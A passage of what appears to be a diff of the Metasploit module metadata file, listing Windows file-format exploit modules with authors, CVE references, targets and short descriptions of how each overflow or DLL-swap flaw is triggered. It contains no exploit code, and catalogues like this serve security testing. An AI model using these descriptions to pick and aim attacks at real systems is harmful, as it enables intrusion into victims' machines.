"windows/fileformat/proshow_cellimage_bof", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/proshow_load_bof": { - "name": "Photodex ProShow Producer 5.0.3256 load File Handling Buffer Overflow", - "fullname": 
"exploit/windows/fileformat/proshow_load_bof", - "aliases": [], - "rank": 300, - "disclosure_date": "2012-06-06", - "type": "exploit", - "author": [ - "Julien Ahrens", - "mr.pr0n", - "juan vazquez " - ], - "description": "This module exploits a stack-based buffer overflow in Photodex ProShow Producer\n v5.0.3256 in the handling of the plugins load list file. An attacker must send the\n crafted \"load\" file to victim, who must store it in the installation directory. The\n vulnerability will be triggered the next time ProShow is opened. The module has been\n tested successfully on Windows XP SP3 and Windows 7 SP1.", - "references": [ - "OSVDB-83745", - "EDB-19563", - "EDB-20036", - "URL-http://security.inshell.net/advisory/30" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Photodex ProShow Producer 5.0.3256 / Windows XP SP3 / Windows 7 SP1" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/proshow_load_bof.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/proshow_load_bof", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/publishit_pui": { - "name": "Publish-It PUI Buffer Overflow (SEH)", - "fullname": "exploit/windows/fileformat/publishit_pui", - "aliases": [], - "rank": 300, - "disclosure_date": "2014-02-05", - "type": "exploit", - "author": [ - "Daniel Kazimirow", - "Andrew Smith \"jakx_\"" - ], - "description": "This module exploits a stack based buffer overflow in Publish-It when\n processing a specially crafted .PUI file. 
This vulnerability could be\n exploited by a remote attacker to execute arbitrary code on the target\n machine by enticing a user of Publish-It to open a malicious .PUI file.", - "references": [ - "OSVDB-102911", - "CVE-2014-0980", - "EDB-31461" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Publish-It 3.6d" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/publishit_pui.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/publishit_pui", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/real_networks_netzip_bof": { - "name": "Real Networks Netzip Classic 7.5.1 86 File Parsing Buffer Overflow Vulnerability", - "fullname": "exploit/windows/fileformat/real_networks_netzip_bof", - "aliases": [], - "rank": 400, - "disclosure_date": "2011-01-30", - "type": "exploit", - "author": [ - "C4SS!0 G0M3S", - "TecR0c " - ], - "description": "This module exploits a stack-based buffer overflow vulnerability in\n version 7.5.1 86 of Real Networks Netzip Classic.\n In order for the command to be executed, an attacker must convince someone to\n load a specially crafted zip file with NetZip Classic.\n By doing so, an attacker can execute arbitrary code as the victim user.", - "references": [ - "OSVDB-83436", - "EDB-16083", - "BID-46059", - "URL-http://proforma.real.com" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows XP SP3", - "Windows 7/Windows Vista" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/real_networks_netzip_bof.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/real_networks_netzip_bof", - "check": false, - "post_auth": false, - "default_credential": 
false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/real_player_url_property_bof": { - "name": "RealPlayer RealMedia File Handling Buffer Overflow", - "fullname": "exploit/windows/fileformat/real_player_url_property_bof", - "aliases": [], - "rank": 300, - "disclosure_date": "2012-12-14", - "type": "exploit", - "author": [ - "suto " - ], - "description": "This module exploits a stack based buffer overflow on RealPlayer <=15.0.6.14.\n The vulnerability exists in the handling of real media files, due to the insecure\n usage of the GetPrivateProfileString function to retrieve the URL property from an\n InternetShortcut section.\n\n This module generates a malicious rm file which must be opened with RealPlayer via\n drag and drop or double click methods. It has been tested successfully on Windows\n XP SP3 with RealPlayer 15.0.5.109.", - "references": [ - "CVE-2012-5691", - "OSVDB-88486", - "BID-56956", - "URL-http://service.real.com/realplayer/security/12142012_player/en/" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows XP SP3 / Real Player 15.0.5.109" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/real_player_url_property_bof.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/real_player_url_property_bof", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/realplayer_ver_attribute_bof": { - "name": "RealNetworks RealPlayer Version Attribute Buffer Overflow", - "fullname": "exploit/windows/fileformat/realplayer_ver_attribute_bof", - "aliases": [], - "rank": 300, - "disclosure_date": "2013-12-20", - "type": "exploit", - "author": [ - "Gabor Seljan" - ], - "description": "This module exploits a stack-based buffer overflow vulnerability in\n 
version 16.0.3.51 and 16.0.2.32 of RealNetworks RealPlayer, caused by\n improper bounds checking of the version and encoding attributes inside\n the XML declaration.\n\n By persuading the victim to open a specially-crafted .RMP file, a\n remote attacker could execute arbitrary code on the system or cause\n the application to crash.", - "references": [ - "BID-64695", - "EDB-30468", - "OSVDB-101356", - "CVE-2013-7260", - "US-CERT-VU-698278", - "URL-http://service.real.com/realplayer/security/12202013_player/en/" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows XP SP2/SP3 (DEP Bypass) / RealPlayer 16.0.3.51/16.0.2.32" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/realplayer_ver_attribute_bof.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/realplayer_ver_attribute_bof", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/safenet_softremote_groupname": { - "name": "SafeNet SoftRemote GROUPNAME Buffer Overflow", - "fullname": "exploit/windows/fileformat/safenet_softremote_groupname", - "aliases": [], - "rank": 400, - "disclosure_date": "2009-10-30", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a stack buffer overflow in SafeNet SoftRemote\n Security Policy Editor <= 10.8.5. 
When an attacker\n creates a specially formatted security policy with an\n overly long GROUPNAME argument, it is possible to execute\n arbitrary code.", - "references": [ - "CVE-2009-3861", - "OSVDB-59660", - "URL-http://www.senseofsecurity.com.au/advisories/SOS-09-008" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows XP SP3 English", - "WinSrv 2000 SP4 English", - "WinSrv 2000 SP2 English", - "WinSrv 2003 Enterprise Edition SP1 (v1023) English" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/safenet_softremote_groupname.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/safenet_softremote_groupname", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/sascam_get": { - "name": "SasCam Webcam Server v.2.6.5 Get() Method Buffer Overflow", - "fullname": "exploit/windows/fileformat/sascam_get", - "aliases": [], - "rank": 100, - "disclosure_date": "2008-12-29", - "type": "exploit", - "author": [ - "dean " - ], - "description": "The SasCam Webcam Server ActiveX control is vulnerable to a buffer overflow.\n By passing an overly long argument via the Get method, a remote attacker could\n overflow a buffer and execute arbitrary code on the system with the privileges\n of the user. 
This control is not marked safe for scripting, please choose your\n attack vector carefully.", - "references": [ - "CVE-2008-6898", - "OSVDB-55945", - "BID-33053" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows XP SP3 / IE 7" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/sascam_get.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/sascam_get", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/scadaphone_zip": { - "name": "ScadaTEC ScadaPhone Stack Buffer Overflow", - "fullname": "exploit/windows/fileformat/scadaphone_zip", - "aliases": [], - "rank": 400, - "disclosure_date": "2011-09-12", - "type": "exploit", - "author": [ - "mr_me " - ], - "description": "This module exploits a stack-based buffer overflow vulnerability in\n version 5.3.11.1230 of scadaTEC's ScadaPhone.\n\n In order for the command to be executed, an attacker must convince someone to\n load a specially crafted project zip file with ScadaPhone.\n By doing so, an attacker can execute arbitrary code as the victim user.", - "references": [ - "CVE-2011-4535", - "OSVDB-75375", - "URL-http://www.scadatec.com/", - "EDB-17817" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows Universal" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/scadaphone_zip.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/scadaphone_zip", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/shadow_stream_recorder_bof": { - "name": "Shadow Stream Recorder 3.0.1.7 Buffer Overflow", - 
"fullname": "exploit/windows/fileformat/shadow_stream_recorder_bof", - "aliases": [], - "rank": 300, - "disclosure_date": "2010-03-29", - "type": "exploit", - "author": [ - "AlpHaNiX ", - "b0telh0 " - ], - "description": "This module exploits a buffer overflow in Shadow Stream Recorder 3.0.1.7.\n Using the application to open a specially crafted asx file, a buffer\n overflow may occur to allow arbitrary code execution under the context\n of the user.", - "references": [ - "CVE-2009-1641", - "OSVDB-81487", - "EDB-11957", - "BID-34864" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows Universal" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/shadow_stream_recorder_bof.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/shadow_stream_recorder_bof", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/shaper_pdf_bof": { - "name": "PDF Shaper Buffer Overflow", - "fullname": "exploit/windows/fileformat/shaper_pdf_bof", - "aliases": [], - "rank": 300, - "disclosure_date": "2015-10-03", - "type": "exploit", - "author": [ - "metacom27 ", - "metacom" - ], - "description": "PDF Shaper is prone to a security vulnerability when processing PDF files.\n The vulnerability appears when we use Convert PDF to Image and use a specially\n crafted PDF file. 
This module has been tested successfully on Win XP, Win 7,\n Win 8, Win 10.", - "references": [ - "EDB-37760" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/shaper_pdf_bof.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/shaper_pdf_bof", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/somplplayer_m3u": { - "name": "S.O.M.P.L 1.0 Player Buffer Overflow", - "fullname": "exploit/windows/fileformat/somplplayer_m3u", - "aliases": [], - "rank": 500, - "disclosure_date": "2010-01-22", - "type": "exploit", - "author": [ - "Rick2600", - "dookie" - ], - "description": "This module exploits a buffer overflow in Simple Open Music Player v1.0. When\n the application is used to import a specially crafted m3u file, a buffer overflow occurs\n allowing arbitrary code execution.", - "references": [ - "OSVDB-64368", - "EDB-11219" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows Universal" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/somplplayer_m3u.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/somplplayer_m3u", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/subtitle_processor_m3u_bof": { - "name": "Subtitle Processor 7.7.1 .M3U SEH Unicode Buffer Overflow", - "fullname": "exploit/windows/fileformat/subtitle_processor_m3u_bof", - "aliases": [], - "rank": 300, - "disclosure_date": "2011-04-26", - "type": "exploit", - "author": [ - "Brandon Murphy", - "sinn3r " - ], - "description": 
"This module exploits a vulnerability found in Subtitle Processor 7. By\n supplying a long string of data as a .m3u file, Subtitle Processor first converts\n this input in Unicode, which expands the string size, and then attempts to copy it\n inline on the stack. This results a buffer overflow with SEH overwritten, allowing\n arbitrary code execution.", - "references": [ - "OSVDB-72050", - "EDB-17217", - "URL-http://sourceforge.net/projects/subtitleproc/" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows XP SP3" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/subtitle_processor_m3u_bof.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/subtitle_processor_m3u_bof", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/syncbreeze_xml": { - "name": "Sync Breeze Enterprise 9.5.16 - Import Command Buffer Overflow", - "fullname": "exploit/windows/fileformat/syncbreeze_xml", - "aliases": [], - "rank": 300, - "disclosure_date": "2017-03-29", - "type": "exploit", - "author": [ - "Daniel Teixeira" - ], - "description": "This module exploits a buffer overflow in Sync Breeze Enterprise 9.5.16\n by using the import command option to import a specially crafted xml file.", - "references": [ - "CVE-2017-7310", - "EDB-41773" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows Universal" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/syncbreeze_xml.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/syncbreeze_xml", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - 
"exploit_windows/fileformat/tfm_mmplayer_m3u_ppl_bof": { - "name": "TFM MMPlayer (m3u/ppl File) Buffer Overflow", - "fullname": "exploit/windows/fileformat/tfm_mmplayer_m3u_ppl_bof", - "aliases": [], - "rank": 400, - "disclosure_date": "2012-03-23", - "type": "exploit", - "author": [ - "RjRjh Hack3r", - "bcoles " - ], - "description": "This module exploits a buffer overflow in MMPlayer 2.2\n The vulnerability is triggered when opening a malformed M3U/PPL file\n that contains an overly long string, which results in overwriting a\n SEH record, thus allowing arbitrary code execution under the context\n of the user.", - "references": [ - "CVE-2009-2566", - "OSVDB-80532", - "BID-52698", - "EDB-18656", - "EDB-18657" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows Universal" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/tfm_mmplayer_m3u_ppl_bof.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/tfm_mmplayer_m3u_ppl_bof", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/theme_dll_hijack_cve_2023_38146": { - "name": "Themebleed- Windows 11 Themes Arbitrary Code Execution CVE-2023-38146", - "fullname": "exploit/windows/fileformat/theme_dll_hijack_cve_2023_38146", - "aliases": [], - "rank": 600, - "disclosure_date": "2023-09-13", - "type": "exploit", - "author": [ - "gabe_k", - "bwatters-r7", - "Spencer McIntyre" - ], - "description": "When an unpatched Windows 11 host loads a theme file referencing an msstyles file, Windows loads the\n msstyles file, and if that file's PACKME_VERSION is `999`, it then attempts to load an accompanying dll\n file ending in `_vrf.dll` Before loading that file, it verifies that the file is signed. 
It does this by\n opening the file for reading and verifying the signature before opening the file for execution.\n Because this action is performed in two discrete operations, it opens the procedure for a time of check to\n time of use vulnerability. By embedding a UNC file path to an SMB server we control, the SMB server can\n serve a legitimate, signed dll when queried for the read, but then serve a different file of the same name\n when the host intends to load/execute the dll.", - "references": [ - "CVE-2023-38146", - "URL-https://exploits.forsale/themebleed/", - "URL-https://github.com/gabe-k/themebleed/tree/main" - ], - "platform": "Windows", - "arch": "x64", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows" - ], - "mod_time": "2024-01-04 11:11:23 +0000", - "path": "/modules/exploits/windows/fileformat/theme_dll_hijack_cve_2023_38146.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/theme_dll_hijack_cve_2023_38146", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [ - "repeatable-session" - ], - "SideEffects": [ - "artifacts-on-disk", - "screen-effects" - ], - "AKA": [ - "ThemeBleed" - ] - }, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/total_video_player_ini_bof": { - "name": "Total Video Player 1.3.1 (Settings.ini) - SEH Buffer Overflow", - "fullname": "exploit/windows/fileformat/total_video_player_ini_bof", - "aliases": [], - "rank": 300, - "disclosure_date": "2013-11-24", - "type": "exploit", - "author": [ - "Mike Czumak", - "Fr330wn4g3 " - ], - "description": "This module exploits a buffer overflow in Total Video Player 1.3.1. The vulnerability\n occurs opening malformed Settings.ini file e.g. 
\"C:\\Program Files\\Total Video Player\\\".\n This module has been tested successfully on Windows WinXp-Sp3-EN, Windows 7, and Windows 8.", - "references": [ - "OSVDB-100619", - "EDB-29799" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows Universal" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/total_video_player_ini_bof.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/total_video_player_ini_bof", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/tugzip": { - "name": "TugZip 3.5 Zip File Parsing Buffer Overflow Vulnerability", - "fullname": "exploit/windows/fileformat/tugzip", - "aliases": [], - "rank": 400, - "disclosure_date": "2008-10-28", - "type": "exploit", - "author": [ - "Stefan Marin", - "Lincoln", - "TecR0c ", - "mr_me " - ], - "description": "This module exploits a stack-based buffer overflow vulnerability\n in the latest version 3.5 of TugZip archiving utility.\n In order to trigger the vulnerability, an attacker must convince someone\n to load a specially crafted zip file with TugZip by double click or file open.\n By doing so, an attacker can execute arbitrary code as the victim user.", - "references": [ - "OSVDB-49371", - "CVE-2008-4779", - "BID-31913", - "EDB-12008" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Universal" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/tugzip.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/tugzip", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/ultraiso_ccd": { - 
"name": "UltraISO CCD File Parsing Buffer Overflow", - "fullname": "exploit/windows/fileformat/ultraiso_ccd", - "aliases": [], - "rank": 500, - "disclosure_date": "2009-04-03", - "type": "exploit", - "author": [ - "jduck " - ], - "description": "This module exploits a stack-based buffer overflow in EZB Systems, Inc's\n UltraISO. When processing .CCD files, data is read from file into a\n fixed-size stack buffer. Since no bounds checking is done, a buffer overflow\n can occur. Attackers can execute arbitrary code by convincing their victim\n to open an CCD file.\n\n NOTE: A file with the same base name, but the extension of \"img\" must also\n exist. Opening either file will trigger the vulnerability, but the files must\n both exist.", - "references": [ - "CVE-2009-1260", - "OSVDB-53275", - "BID-34363", - "BID-38613", - "EDB-8343" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows Universal - Double-Click/Command Line Open Method", - "Windows Universal - File->Open + Toolbar Open Methods" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/ultraiso_ccd.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/ultraiso_ccd", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/ultraiso_cue": { - "name": "UltraISO CUE File Parsing Buffer Overflow", - "fullname": "exploit/windows/fileformat/ultraiso_cue", - "aliases": [], - "rank": 500, - "disclosure_date": "2007-05-24", - "type": "exploit", - "author": [ - "n00b", - "jduck " - ], - "description": "This module exploits a stack-based buffer overflow in EZB Systems, Inc's\n UltraISO. When processing .CUE files, data is read from file into a\n fixed-size stack buffer. Since no bounds checking is done, a buffer overflow\n can occur. 
Attackers can execute arbitrary code by convincing their victim\n to open an CUE file.\n\n NOTE: A file with the same base name, but the extension of \"bin\" must also\n exist. Opening either file will trigger the vulnerability, but the files must\n both exist.", - "references": [ - "CVE-2007-2888", - "OSVDB-36570", - "BID-24140", - "EDB-3978" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows - UltraISO v8.6.2.2011 portable", - "Windows - UltraISO v8.6.0.1936" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/ultraiso_cue.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/ultraiso_cue", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/ursoft_w32dasm": { - "name": "URSoft W32Dasm Disassembler Function Buffer Overflow", - "fullname": "exploit/windows/fileformat/ursoft_w32dasm", - "aliases": [], - "rank": 400, - "disclosure_date": "2005-01-24", - "type": "exploit", - "author": [ - "aushack " - ], - "description": "This module exploits a buffer overflow in W32Dasm <= v8.93.\n By creating a malicious file and convincing a user to disassemble\n the file with a vulnerable version of W32Dasm, the Imports/Exports\n function is copied to the stack and arbitrary code may be executed\n locally as the user.", - "references": [ - "CVE-2005-0308", - "OSVDB-13169", - "BID-12352", - "URL-http://aluigi.altervista.org/adv/w32dasmbof-adv.txt" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows XP SP0" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/ursoft_w32dasm.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/ursoft_w32dasm", - "check": false, - "post_auth": 
false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/varicad_dwb": { - "name": "VariCAD 2010-2.05 EN (DWB File) Stack Buffer Overflow", - "fullname": "exploit/windows/fileformat/varicad_dwb", - "aliases": [], - "rank": 500, - "disclosure_date": "2010-03-17", - "type": "exploit", - "author": [ - "n00b", - "dookie", - "MC ", - "jduck " - ], - "description": "This module exploits a stack-based buffer overflow in VariCAD 2010-2.05 EN.\n An attacker must send the file to victim and the victim must open the file.", - "references": [ - "OSVDB-63067", - "BID-38815", - "EDB-11789" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows Universal" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/varicad_dwb.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/varicad_dwb", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/videocharge_studio": { - "name": "VideoCharge Studio Buffer Overflow (SEH)", - "fullname": "exploit/windows/fileformat/videocharge_studio", - "aliases": [], - "rank": 300, - "disclosure_date": "2013-10-27", - "type": "exploit", - "author": [ - "metacom", - "Andrew Smith", - "Christian Mehlmauer " - ], - "description": "This module exploits a stack based buffer overflow in VideoCharge Studio 2.12.3.685 when\n processing a specially crafted .VSC file. 
This vulnerability could be\n exploited by a remote attacker to execute arbitrary code on the target\n machine by enticing a user of VideoCharge Studio to open a malicious .VSC file.", - "references": [ - "OSVDB-69616", - "EDB-29234" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "VideoCharge Studio 2.12.3.685" - ], - "mod_time": "2023-04-04 09:48:51 +0000", - "path": "/modules/exploits/windows/fileformat/videocharge_studio.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/videocharge_studio", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [], - "SideEffects": [], - "Reliability": [], - "NOCVE": [ - "Reason not given" - ] - }, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/videolan_tivo": { - "name": "VideoLAN VLC TiVo Buffer Overflow", - "fullname": "exploit/windows/fileformat/videolan_tivo", - "aliases": [], - "rank": 400, - "disclosure_date": "2008-10-22", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a buffer overflow in VideoLAN VLC 0.9.4.\n By creating a malicious TY file, a remote attacker could overflow a\n buffer and execute arbitrary code.", - "references": [ - "CVE-2008-4654", - "OSVDB-49181", - "BID-31813" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "VideoLAN VLC 0.9.4 (XP SP3 English)", - "VideoLAN VLC 0.9.2 (XP SP3 English)" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/videolan_tivo.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/videolan_tivo", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/videospirit_visprj": { - "name": "VeryTools Video 
Spirit Pro", - "fullname": "exploit/windows/fileformat/videospirit_visprj", - "aliases": [], - "rank": 400, - "disclosure_date": "2011-04-11", - "type": "exploit", - "author": [ - "Acidgen", - "corelanc0d3r " - ], - "description": "This module exploits a stack buffer overflow in Video Spirit <= 1.70.\n When opening a malicious project file (.visprj), a stack buffer overflow occurs,\n resulting in arbitrary code execution.\n This exploit bypasses DEP & ASLR, and works on XP, Vista & Windows 7.", - "references": [ - "CVE-2011-0499", - "CVE-2011-0500", - "OSVDB-70619", - "URL-http://www.corelan.be/advisories.php?id=CORELAN-11-001" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows XP/Vista/Win7/... Generic DEP & ASLR Bypass" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/videospirit_visprj.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/videospirit_visprj", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/visio_dxf_bof": { - "name": "Microsoft Office Visio VISIODWG.DLL DXF File Handling Vulnerability", - "fullname": "exploit/windows/fileformat/visio_dxf_bof", - "aliases": [], - "rank": 400, - "disclosure_date": "2010-05-04", - "type": "exploit", - "author": [ - "Unknown", - "Shahin Ramezany ", - "juan vazquez " - ], - "description": "This module exploits a stack based overflow vulnerability in the handling\n of the DXF files by Microsoft Visio 2002. Revisions prior to the release of\n the MS bulletin MS10-028 are vulnerable. 
The overflow occurs when the application\n is used to import a specially crafted DXF file, while parsing the HEADER section\n of the DXF file.\n\n To trigger the vulnerability an attacker must convince someone to insert a\n specially crafted DXF file to a new document, go to 'Insert' -> 'CAD Drawing'", - "references": [ - "CVE-2010-1681", - "OSVDB-64446", - "BID-39836", - "URL-http://www.coresecurity.com/content/ms-visio-dxf-buffer-overflow", - "URL-http://web.archive.org/web/20101113032001/http://www.exploit-db.com:80/moaub-8-microsoft-office-visio-dxf-file-stack-overflow/" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Visio 2002 English on Windows XP SP3 Spanish", - "Visio 2002 English on Windows XP SP3 English" - ], - "mod_time": "2025-02-28 09:35:28 +0000", - "path": "/modules/exploits/windows/fileformat/visio_dxf_bof.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/visio_dxf_bof", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/visiwave_vwr_type": { - "name": "VisiWave VWR File Parsing Vulnerability", - "fullname": "exploit/windows/fileformat/visiwave_vwr_type", - "aliases": [], - "rank": 500, - "disclosure_date": "2011-05-20", - "type": "exploit", - "author": [ - "mr_me ", - "TecR0c " - ], - "description": "This module exploits a vulnerability found in VisiWave's Site Survey Report application.\n When processing .VWR files, VisiWaveReport.exe attempts to match a valid pointer based on the 'Type'\n property (valid ones include 'Properties', 'TitlePage', 'Details', 'Graph', 'Table', 'Text',\n 'Image'), but if a match isn't found, the function that's supposed to handle this routine\n ends up returning the input as a pointer, and later used in a CALL DWORD PTR [EDX+10]\n instruction. 
